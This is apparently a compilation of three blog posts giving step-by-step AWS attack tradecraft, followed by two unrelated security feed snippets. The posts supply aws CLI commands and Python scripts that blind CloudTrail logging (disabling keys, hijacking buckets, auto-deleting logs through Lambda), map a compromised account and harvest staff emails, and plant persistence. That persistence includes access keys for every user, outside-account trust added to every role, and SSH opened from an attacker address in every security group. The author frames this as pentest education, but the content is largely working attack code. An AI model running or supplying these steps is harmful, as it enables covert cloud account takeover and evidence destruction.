While that’s by far the slickest encryption tactic, there are others. You can start encrypting a trail, disable the key and schedule it for deletion. If you aren’t going to disable the key, you can remove the disable and delete actions from the policy to make the key undeletable (it’s a word, trust me).

aws kms disable-key --key-id [my-key]
aws kms schedule-key-deletion --key-id [my-key] --pending-window-in-days 7

The deletion won't happen for 7 days but the trail won't be written regardless. Manually inspecting the trail in the AWS web interface won't show any signs of failure either, unless the victim is familiar enough with the interface to notice a missing 'last delivered' section. However, checking the trail status via the CLI will show "LatestDeliveryError" as "KMS.DisabledException".

aws cloudtrail get-trail-status --name [my-trail]

Finally, if you really wanted to be mean, you could set the encryption key to be one hosted in another account you control. The only minor change required to the base tactic is to ensure the “GenerateDataKey*” action includes the source account-id in the condition section.

If you wanted to be even meaner and found out your victim knew you did this mean thing, you could send them an email suggesting they make a one time tax-free donation to get a copy of the key. That’s a joke — ransomware is pure evil and needs to die in a fire but doing it through AWS does add some dramatic effect, no?

CloudTrails are written to S3 buckets so logs can be redirected to a separate account owned by someone else. You know, like… you. Or better yet, a cyber-patsy™ (I thought this blog was cyber free?). The S3 namespace is global and world writable buckets are more plentiful than poop in my kid’s nappies, and that’s saying a lot! More on that at some point in the future (the buckets not the poop).

aws cloudtrail update-trail --name my-trail --s3-bucket-name [cyber-patsy-bucket]

I know what you are thinking. Scrap that, I barely know what I am thinking but this S3 bucket stuff is interesting, right?

Targeting the S3 bucket where logs are being written has some distinct advantages. It’s much stealthier than manipulating a trail directly. It’s also more likely to be an available option in a more restricted account context.

As with encryption keys, it is possible to delete a bucket being used for logging.

aws s3 rb --force [s3://my-bucket]

The results are much the same with the exception that the failure is very visible when the affected trail is viewed in the AWS web console.

Similarly, it’s possible to update the bucket policy to prevent CloudTrail from writing to it. Simply delete the “AWSCloudTrailWrite20150319” section of the default generated policy.
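
After the deletion, the remaining policy might look roughly like this; the statement Sids here are reproduced from memory of the console-generated default, so verify against the actual policy on the target bucket:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AWSCloudTrailAclCheck20150319",
      "Effect": "Allow",
      "Principal": {"Service": "cloudtrail.amazonaws.com"},
      "Action": "s3:GetBucketAcl",
      "Resource": "arn:aws:s3:::[my-bucket]"
    }
  ]
}
```

Leaving the ACL check statement intact keeps the policy looking plausible at a glance while still denying the write.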

Then write the policy to the bucket.

aws s3api put-bucket-policy --bucket [my-bucket] --policy [file:///my-policy.json]

Again, logging will stop and the web console will display a policy error when viewing the affected trail.

I did attempt to abuse bucket ACLs (these are separate from policies, not sure why) but came up with nothing. It seems even removing the owner's ACL wasn't effective, as it could simply be reinstated by the bucket owner.

One of the stealthiest but riskiest options to disrupt logging is to manipulate the target bucket’s lifecycle policy. Buckets can be configured to automatically delete objects after one (or more) days.

aws s3api put-bucket-lifecycle-configuration \
--bucket [my-bucket] \
--lifecycle-configuration [file://s3-lifecycle-config.json]

It's unlikely this tactic will be monitored; however, log files will still live for one day, and any external ingestion of those files into a SIEM is likely to proceed unimpeded.
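
The referenced s3-lifecycle-config.json isn't shown in the post; a minimal version expiring everything after a day might look like the following (rule ID is mine):

```json
{
  "Rules": [
    {
      "ID": "expire-logs",
      "Prefix": "",
      "Status": "Enabled",
      "Expiration": {"Days": 1}
    }
  ]
}
```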

There's an elephant in the room. Have you seen it? Simply deleting the log files immediately once they are written hasn't been mentioned. That's because AWS, being awesome, provides an automated mechanism infinitely better than manually deleting the files, and I saved it till last. Introducing AWS Lambda.

AWS Lambda is a compute service where you can upload your code to AWS Lambda and the service can run the code on your behalf using AWS infrastructure. After you upload your code and create what we call a Lambda function, AWS Lambda takes care of provisioning and managing the servers that you use to run the code. You can use AWS Lambda as … an event-driven compute service where AWS Lambda runs your code in response to events, such as changes to data in an Amazon S3 bucket...

Setting up a Lambda function to immediately delete anything written to an S3 bucket is a little louder and more involved than any other tactic discussed, but it’s worth it. Because the Lambda function is invoked directly by S3, it will win any race against other code attempting to consume files written to the bucket, effectively making them invisible.

To get it going, create a role that can be assumed by Lambda.

aws iam create-role \
--role-name [lambda_s3_innocent_role] \
--assume-role-policy-document [file:///iam-assume-by-lambda.json]
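
The trust policy in iam-assume-by-lambda.json isn't included above; the standard document letting the Lambda service assume the role looks like this:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {"Service": "lambda.amazonaws.com"},
      "Action": "sts:AssumeRole"
    }
  ]
}
```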

Create a policy to attach to the role that allows Lambda to delete s3 objects and whatever else you like. You could also update an existing policy for extra stealth.

aws iam create-policy \
--policy-name [lambda_s3_innocent_policy] \
--policy-document [file:///lambda-s3-delete-policy.json]
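
A minimal lambda-s3-delete-policy.json might look like the following; scope the Resource down, or pad it out with innocuous decoy permissions for extra stealth:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:DeleteObject",
      "Resource": "arn:aws:s3:::[my-bucket]/*"
    }
  ]
}
```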

Attach the policy to the role.

aws iam attach-role-policy \
--role-name [lambda_s3_innocent_role] \
--policy-arn arn:aws:iam::[account-id]:policy/[lambda_s3_innocent_policy]

Create the actual Lambda python function code that will delete an s3 object passed to it every time it is invoked.

Compress the code and register the function.

aws lambda create-function \
--region [region] \
--function-name [innocent_function] \
--zip-file [fileb:///] \
--role arn:aws:iam::[account-id]:role/[lambda_s3_innocent_role] \
--handler [my_code].lambda_handler \
--runtime python2.7 \
--timeout 3 \
--memory-size 128

Permit Lambda to be invoked by S3.

aws lambda add-permission \
--function-name [innocent_function] \
--statement-id [my-guid] \
--principal s3.amazonaws.com \
--action lambda:InvokeFunction \
--source-arn arn:aws:s3:::[my-bucket]

Configure the bucket to call Lambda every time it creates an object.

aws s3api put-bucket-notification-configuration \
--bucket [my-bucket] \
--notification-configuration [file:///s3-notify-config.json]
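
The notification configuration file isn't reproduced either; a sketch of s3-notify-config.json wiring all object creation events to the function:

```json
{
  "LambdaFunctionConfigurations": [
    {
      "Id": "[my-guid]",
      "LambdaFunctionArn": "arn:aws:lambda:[region]:[account-id]:function:[innocent_function]",
      "Events": ["s3:ObjectCreated:*"]
    }
  ]
}
```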

Easy, right? Kind of, maybe, at least? There’s more good news though.

The Lambda free tier includes 1M free requests per month and 400,000 GB-seconds of compute time per month.

Unusual billing patterns tip off administrators more often than people would like to admit but this tactic combined with the Lambda free tier conveniently avoids those awkward moments.

This article was written under the assumption you have access to an AWS API key or role with some reasonably broad permissions and an up-to-date awscli installed.

More importantly, it was written to enlighten AWS account administrators and improve legitimate penetration testing TTPs. In fact, as I wrote this article, engineers at my workplace implemented mitigations and tests for gaps this work identified. Regardless, let's not fool ourselves, our foes are orders of magnitude smarter than me and probably also know what "orders of magnitude" means precisely. Help?

Go forth and conquer.


Disrupting AWS logging was originally published in Cyber Free on Medium, where people are continuing the conversation by highlighting and responding to this story.



Exploring an AWS account post-compromise

So you’ve pwned an AWS account — congratulations — now what? You’re eager to get to the data theft, amirite? Not so fast grasshopper, have you disrupted logging? Choice! Time to look around and understand what you have.

Your instinct is probably to type “whoami” and luckily AWS has an equivalent.

aws sts get-caller-identity

It won't give you much but it will start painting the picture. The information returned is "not secret" but it can be painful to obtain otherwise. For example, crafting Amazon Resource Names (ARNs) is a key part of doing stuff in AWS, but account numbers, a constituent part of ARNs, are not typically disclosed outside an account. The identity ARN will also likely have a descriptive role or user name that may give you an immediate feel for your access.

{
    "Account": "123456789012",
    "Arn": "arn:aws:iam::123456789012:user/root"
}

From here, there are a number of options depending on your goals.

Most big organisations that utilise AWS will connect their data centres and offices directly to Amazon using the Direct Connect service.

AWS Direct Connect links your internal network to an AWS Direct Connect location over a standard 1 gigabit or 10 gigabit Ethernet fiber-optic cable. One end of the cable is connected to your router, the other to an AWS Direct Connect router. With this connection in place, you can create virtual interfaces directly to the AWS cloud …, bypassing Internet service providers in your network path.

Like other AWS services, there is an API to interact with, and it can be extremely revealing. Describing locations will display metadata about any connections.

aws directconnect describe-locations | jq '.locations [] | .locationCode + " " + .locationName'

A typical result will include a list of aliases and physical facility locations.

"MyDC1 N 11600 W, Saratoga Springs, UT 84045"
"MyDC2 7135 S Decatur Blvd, Las Vegas, NV 89118"
"NSADC 1400 Defense Pentagon Washington, DC 20301"

That information has a nice synergy (now there is only 'information super highway' left on my bingo board) with route table data provided by interrogating the EC2 API.

aws ec2 describe-route-tables | jq '.RouteTables | .[] | .Routes [] | .GatewayId + " " + .DestinationCidrBlock' | sort | uniq

You should be able to match locations with the returned IP ranges and later use the matches to tunnel back into data centres or sometimes, even corporate networks. The above command filters out the noise, showing only gateway IDs and destination networks.


Virtual gateways are associated with virtual private clouds (VPCs), which are the network containers used to group resources like EC2 instances and Lambda functions. If you can compromise such a resource or create one in the right VPC, you should be able to route normally through those gateways unless network ACLs prevent it. Listing NACLs is also an EC2 call.

aws ec2 describe-network-acls | jq '.NetworkAcls [] .Entries [] | .Protocol + " " + .RuleAction + " " + .CidrBlock' | sort | uniq

Any deny rules are valuable in that they provide a ready made target list of things your target does not want outsiders to access. As you might expect, the rules are manageable through API. Protocol numbers are as per the IANA Assigned Internet Protocol Numbers, and -1 is a wildcard for all protocols.

"-1 allow"
"6 deny"
"6 deny"

As an aside, Amazon appears to have made a blunder, bundling bazillions (alliteration achievement attained) of extraneous API functions into the EC2 API namespace. It is both common and easy to write lazy AWS policies that allow all actions to be executed in a particular API. For example:

"Action": "ec2:*"

One final query worth running to get a better sense of the network is to ask Route53 for all of the hosted zones.

aws route53 list-hosted-zones | jq '.HostedZones [] .Name'

As you might expect, this produces a simple list of domain names owned by your target and controlled in AWS.


After you’ve mapped all the networky bits, it’s time to move on to identities and access.

AWS Identity and Access Management (IAM) is a web service that you can use to manage users and user permissions under your AWS account.

IAM is where a lot of the magic and good stuff lives. It’s extremely complicated but extremely powerful, and likely where you will be investing a lot of your reconnaissance and persistence efforts.

Listing users will give you a feel for both the size of the account and the scope of attack surface.

aws iam list-users | jq '.Users [] .Arn'

People tend to name users using either their identity or the intended purpose of the account.


In large enterprise accounts you may find yourself in the odd situation of the user list being tiny. That could be because authentication is federated via a SAML provider. To reveal this situation, list the identity providers using the IAM API.

aws iam list-saml-providers | jq '.SAMLProviderList [] .Arn'

Most of the major 3rd party identity services integrate seamlessly with AWS, so it's not unusual for one of those to be returned.


The SAML provider an organisation uses for AWS authentication is highly correlated with the provider they use for other cloud services and internal systems — Yay for single sign-on. Knowing this can dramatically change other tactics you employ and reduce rage from banging your head against an invisible 2FA brick wall.

However, the true power of IAM is in roles. Roles are assumed by users authenticating via SAML. Roles are how Amazon recommends you start your EC2 instances and how it forces you to work in newer services like Lambda. Roles are the magic that gives you keyless API calls. Roles are the future.

You can use roles to delegate access to users, applications, or services that don’t normally have access to your AWS resources. For example, you might want to grant users in your AWS account access to resources they don’t usually have, or grant users in one AWS account access to resources in another account. Or you might want to allow a mobile app to use AWS resources… Sometimes you want to give AWS access to users who already have identities defined outside of AWS, such as in your corporate directory. Or, you might want to grant access to your account to third parties so that they can perform an audit on your resources.

If roles are the future, the ‘list-roles’ function is the Almanac from Back to the Future Part II.

aws iam list-roles | jq '.Roles [] .Arn'

In general, role names also tend to be quite descriptive. The full list of role ARNs is critical for escalating privileges and moving laterally within AWS.


Conveniently, if you are bored and want to go through all user, role, and policy data with a fine-tooth comb (the hyphen is important because I’m not sure what you’d do with a fine tooth-comb?!), there’s an API to retrieve all the details at once.

aws iam get-account-authorization-details

Finally, while SSH key pairs aren’t strictly part of IAM — they are predictably part of EC2 — they are another identifier that can help with mapping how an organisation deals with access.

aws ec2 describe-key-pairs | jq '.[][] .KeyName'

You should see a list of key names, which might tell you who has access to resources and for what purpose. Shared keys might make for good targets.


AWS has a pretty extensive and easy to use support program, accessible from the web interface. It turns out that the typical message-based support interaction provided by the web interface is just a thin layer over yet another API.

The AWS Support API reference is intended for programmers who need detailed information about the AWS Support operations and data types. This service enables you to manage your AWS Support cases programmatically.

You can list support cases to gather interesting intelligence about what the account administrators are attempting to resolve and identify areas of concern.

aws support describe-cases --include-resolved-cases | jq '.cases [] | .subject'

… Like a compromise of their AWS account.

"Limit Increase: EC2 Instances"
"My password doesn't work - please set it to hunter2."
"I think someone hacked our AWS account"

At this point, you might consider easing the stress on overworked Amazon support staff by closing any such cases with a comment like, “Nvm dudez, it waz just our Nessus boxen gone rogue”.

Within a single account, support cases are often logged by many users, and those cases can spiral into big CC chains. This provides an opportunity to gather email addresses to target in later activity.

aws support describe-cases --include-resolved-cases | jq '.cases [] | .submittedBy, .ccEmailAddresses []' | sort | uniq

This article was written under the assumption you have access to an AWS API key or role with some reasonably broad permissions, and up-to-date installs of awscli and jq.

More importantly, it was written to enlighten AWS account administrators and improve legitimate penetration testing TTPs. In fact, as I wrote this article, engineers at my workplace implemented mitigations, detection logic and tests for gaps this work identified. Regardless, let’s not fool ourselves, our foes are already Internet Explorers of the Highest Order of Business Excellence. They are setting sail in our clouds right now.


Exploring an AWS account post-compromise was originally published in Cyber Free on Medium, where people are continuing the conversation by highlighting and responding to this story.



Backdooring an AWS account

So you’ve pwned an AWS account — congratulations — now what? You’re eager to get to the data theft, amirite? Not so fast whipper snapper, have you disrupted logging? Do you know what you have? Sweet! Time to get settled in.

Maintaining persistence in AWS is limited only by your imagination, but there are a few obvious and oft-used techniques everyone should know and watch for.

No one wants to get locked out mid-hack, so grab yourself some temporary credentials.

aws sts get-session-token --duration-seconds 129600

Acceptable durations for IAM user sessions range from 900 seconds (15 minutes) to 129600 seconds (36 hours), with 43200 seconds (12 hours) as the default. Sessions for AWS account owners are restricted to a maximum of 3600 seconds (one hour). If the duration is longer than one hour, the session for AWS account owners defaults to one hour.

You'll want to set up a cron job to do this regularly from here on out. It might sound crazy, but it ain't no lie. Baby, bye, bye, bye (sorry, got distracted). A sensible person might assume that deleting a compromised access key is a reasonable way to expunge an attacker. Alas, disabling or deleting the original access key does not kill any temporary credentials created with it. So if you find yourself ousted, you may still get somewhere between 0 and 36 hours to recover.

There are some limitations:

  • You cannot call any IAM APIs unless MFA authentication information is included in the request.
  • You cannot call any STS API except assume-role.

That does create an annoyance but an annoyance that’s trivially overcome. Assuming another role is an API call away. Spinning up compute running under another execution role or instance profile, that can call IAM, is almost as easy.

The best (worst?) part, however, is that temporary session keys don't show up anywhere. Checking the web interface or running "aws iam list-access-keys" is ineffective. There's no "list-session-tokens" or "delete-session-token" to go along with "get-session-token". There have been more sightings of the Loch Ness Monster in the wild than of AWS session tokens.

This is the entire STS API at time of writing.

I really do hope Amazon does something about this soon. Having someone use the force instead of the API within the accounts I’m responsible for genuinely scares me.

Now that you have insurance, it’s time to burrow in. If being loud and drunk is your cup of Malört, you could just create a new user and access key. Make it look like an existing user, kind of like typo-squatting, and you’ll have yourself a genuine lying-dormant cyber pathogen.

Busting out a new user and key takes two one-liners. Some might call it a two-liner but I’m not into that kind of thing.

aws iam create-user --user-name [my-user]
aws iam create-access-key --user-name [my-user]

In response, you’ll receive an access key ID and a secret access key, which you’ll want to take note of.

"AccessKey": {
    "UserName": "[my-user]",
    "Status": "Active",
    "SecretAccessKey": "hunter2"
}

That approach is nice but it’s not the kind of persistent persistence you want. Should the user or access key get discovered, it will take half the API calls to kill them that it did to create them. You’ll be left with only stories about how you used to hack things when you were young. I’ll be waiting for you there with my cup of washed-up sadness.

Instead of creating a new account, it’s more effective to create a new access key for every user in bulk. Bonus points to those who acquire temporary session tokens at the same time.

The code to do it is straightforward. Even a manager (like me) can write it.

The error handling is somewhat important here, as the default key limit per user is two and you will bump up against it semi-regularly. Additionally, all access keys have visible creation timestamps, which make them easy to spot during a review. Another limitation is that federated (SAML authenticated) users won't be affected, as they integrate with roles rather than user accounts.
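
The original code block isn't shown here, so this is a hedged sketch (function and variable names are mine). It mints a fresh access key for every IAM user and skips anyone already at the key limit:

```python
def backdoor_all_users(iam=None):
    """Create an access key for every IAM user; return the harvested keys."""
    if iam is None:
        import boto3  # real client when run against AWS
        iam = boto3.client('iam')
    harvested = []
    for page in iam.get_paginator('list_users').paginate():
        for user in page['Users']:
            try:
                key = iam.create_access_key(UserName=user['UserName'])['AccessKey']
            except Exception as error:  # botocore ClientError in practice
                # Users may hold at most two access keys by default; skip
                # anyone already at the limit rather than aborting the run.
                if 'LimitExceeded' in str(error):
                    continue
                raise
            harvested.append((key['AccessKeyId'], key['SecretAccessKey']))
    return harvested
```

Passing the client in as a parameter also makes the logic easy to dry-run against a stub before pointing it at a live account.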

At this point any good auditor would claim that this was merely a point-in-time activity, leaving potentially risky compliance gaps when new accounts are created in the future. Alas, feisty auditors, there is a solution!

Just create a Lambda function that reacts to user creations via a CloudWatch Event Rule and automagically adds a disaster recovery access key and posts it to a PCI-DSS compliant location of your choosing.

AWS Lambda is a server-less compute thingy (only precise technical terms allowed) that runs a function immediately in response to events and automatically manages the underlying infrastructure. CloudWatch Event Rules are a mechanism for notifying other AWS services of state changes in resources in near real time. They have a very natural relationship as CloudWatch provides the sub-system for monitoring AWS API calls and invoking Lambda functions that execute self-contained business logic.

The API calls and deployment packaging required to set up a Lambda function are a bit convoluted but well documented. You can plough through manually and gain valuable plough experience or use a framework like Serverless to avoid unnecessary wear on your delicate hands. Just ensure the function's execution role has the "iam:CreateAccessKey" permission.

Users are so 90s though! Like the Backstreet Boys. Not like Michael Bolton. He's timeless. I mean, how am I supposed to live without him? Now that I've been lovin' him so long.

The AWS recommended ISO* compliant method for escalating privileges is to use the STS assume role API call. Amazon describes it so perfectly, I would be robbing you by not quoting it directly.

For cross-account access, imagine that you own multiple accounts and need to access resources in each account. You could create long-term credentials in each account to access those resources. However, managing all those credentials and remembering which one can access which account can be time consuming. Instead, you can create one set of long-term credentials in one account and then use temporary security credentials to access all the other accounts by assuming roles in those accounts.

Sold! First, create the role.

aws iam create-role \
--role-name [my-role] \
--assume-role-policy-document [file://assume-role-policy.json]

The assume role policy document must include the ARN of the users, roles or accounts that will be accessing the backdoored role. It’s best to specify “[account-id]:root”, which acts as a wild card for all users and roles in a given account.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::[account-id]:root"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Then attach a policy to the backdoored role describing the actions it can perform. All of them, IMHO. The pre-canned “AdministratorAccess” policy works a treat as it is analogous to root.

aws iam attach-role-policy \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess \
--role-name [my-role]

There you have it, a freshly minted role to assume from your other pwned accounts without the hassle of managing all those pesky extra credentials.

While elegant, this approach does have its disadvantages. At some point in the chain of role assumptions, access credentials are required. In the event those credentials or pwned accounts are discovered and purged, your access will die with them.

As before, it’s more effective to backdoor the existing roles in an account than create new ones. The code is trickier this time because it requires massaging of existing assume role policies and their structural edge cases. I’ve tried to comment them fully in the code below but edge cases may have been missed.

While adding access keys to a user leaves a trail of recent creation timestamps, by default there is no easy way to identify which part of a policy has been modified. Defenders may be able to identify that a policy has changed, but without external record keeping of previous policy versions, they will be left to comb through each policy looking for bad account trusts. This is made more difficult by randomising source account ARNs.
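
Since the code itself isn't reproduced here, this is a hedged sketch (helper names are mine): splice an extra trust statement into every role's assume role policy so [account-id] can assume them all.

```python
BACKDOOR_STATEMENT = {
    'Effect': 'Allow',
    'Principal': {'AWS': 'arn:aws:iam::[account-id]:root'},
    'Action': 'sts:AssumeRole',
}


def add_backdoor(policy):
    """Return a copy of an assume role policy with the extra trust spliced in."""
    statements = policy.get('Statement', [])
    # Structural edge case: single-statement policies may carry a bare dict
    # rather than a list of statements.
    if isinstance(statements, dict):
        statements = [statements]
    return dict(policy, Statement=statements + [BACKDOOR_STATEMENT])


def backdoor_all_roles(iam=None):
    import json
    if iam is None:
        import boto3
        iam = boto3.client('iam')
    for page in iam.get_paginator('list_roles').paginate():
        for role in page['Roles']:
            doc = add_backdoor(role['AssumeRolePolicyDocument'])
            iam.update_assume_role_policy(
                RoleName=role['RoleName'], PolicyDocument=json.dumps(doc))
```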

Finally, to future proof it all, create a Lambda function that responds to role creations via a CloudWatch Event Rule. As with the access key example, the below code posts the backdoored ARN to a location of your choosing. You may also want to send the role’s permissions and source ARN.

If you were less lazy than me, you could make the code react to UpdateAssumeRolePolicy calls and reintroduce backdoors that are removed.

Sometimes you'll want to maintain access to live resources rather than the AWS API. For those situations there's one other basic access persistence tactic worth discussing in an introductory piece: security groups. Security groups tend to get in the way of such things; SSH and database ports aren't typically accessible to the Internet.

A security group acts as a virtual firewall for your instance to control inbound and outbound traffic. When you launch an instance in a VPC, you can assign the instance to up to five security groups. Security groups act at the instance level, not the subnet level. Therefore, each instance in a subnet in your VPC could be assigned to a different set of security groups.

In practice, “instances” is broader than just EC2. Security groups could be applied to Lambda functions, RDS databases, and other resources that support VPCs.

By now you know the drill. Creating a new security group or rule and applying it to one or two resources is okay, but let's skip that step and just do all of them. Shockingly (can I be shocked by my own set definitions?), "all of them" includes the default security group. This is important because if a resource does not have a security group associated with it, the default security group is implicitly associated.
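
A hedged sketch of "all of them" (names and the port/CIDR choice are mine): punch an SSH hole from an attacker-controlled address into every security group, defaults included.

```python
def open_ssh_everywhere(ec2=None, cidr='[attacker-ip]/32'):
    """Add a tcp/22 ingress rule from cidr to every security group."""
    if ec2 is None:
        import boto3
        ec2 = boto3.client('ec2')
    touched = []
    for group in ec2.describe_security_groups()['SecurityGroups']:
        try:
            ec2.authorize_security_group_ingress(
                GroupId=group['GroupId'], IpProtocol='tcp',
                FromPort=22, ToPort=22, CidrIp=cidr)
        except Exception:
            # Duplicate-rule errors and the like are safe to skip here.
            continue
        touched.append(group['GroupId'])
    return touched
```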

Some older accounts still have services running in "EC2 Classic" mode, which means that modifying only EC2 security groups is not sufficient. Back in the day, RDS, ElastiCache, and Redshift had their own implementations of security groups. Their relevant authorise functions would need to be called to get full security group coverage:

  • authorize_db_security_group_ingress
  • authorize_cache_security_group_ingress
  • authorize_cluster_security_group_ingress

This approach has been phased out. In fact, accounts created after 4th December 2013 cannot use EC2 Classic at all.

Finally, complete the circle of life with a Lambda function that executes when create security group CloudWatch Event Rules are fired.

The extra access rules are pretty easy to spot just by eyeballing the security group. However, the workflow for creating a security group via the web console involves defining all the rules prior to actually calling the API. Consequently, unless someone returns to refine a security group, they are unlikely to notice the extra line item.

Between this and the other tactics, you should be well and truly entrenched in a pwned AWS account. You might not be a devil worm but you are certainly a wombat. An AWS WOMBAT!

It is obvious this information could be used for good and evil. I used it to strengthen the security posture of accounts I am responsible for and to make detection processes testable. Professional penetration testers will use it to mimic real world attackers in their engagements. Please do the same. Don't be evil.

Whatever your choice, none of this is unattainable to even the scriptiest (anyone know why there's a red underline under that word? hmmm) of script kiddies. It's better for everyone to have access to the knowledge than just the bad guys.


Backdooring an AWS account was originally published in Cyber Free on Medium, where people are continuing the conversation by highlighting and responding to this story.



Windows 10 x86/wow64 Userland heap

Introduction Hi all, over the course of the past few weeks, I received a number of "emergency" calls from some relatives, asking me to look at their computer because "things were broken", "things looked different" and "I think my computer got hacked". I quickly realized that their computers got upgraded to Windows 10. We […]

SSD Advisory – Teco SG2 and TP3 Vulnerabilities

Vulnerabilities Description: Multiple vulnerabilities have been found in Teco's SG2 and TP3 products; these vulnerabilities allow attackers who can supply the products with a specially crafted file to cause them to execute arbitrary code. TECO TP3 PC-LINK tpc file parsing Stack Buffer Overflow Code Execution. TECO uses their own proprietary file format known … Continue reading SSD Advisory – Teco SG2 and TP3 Vulnerabilities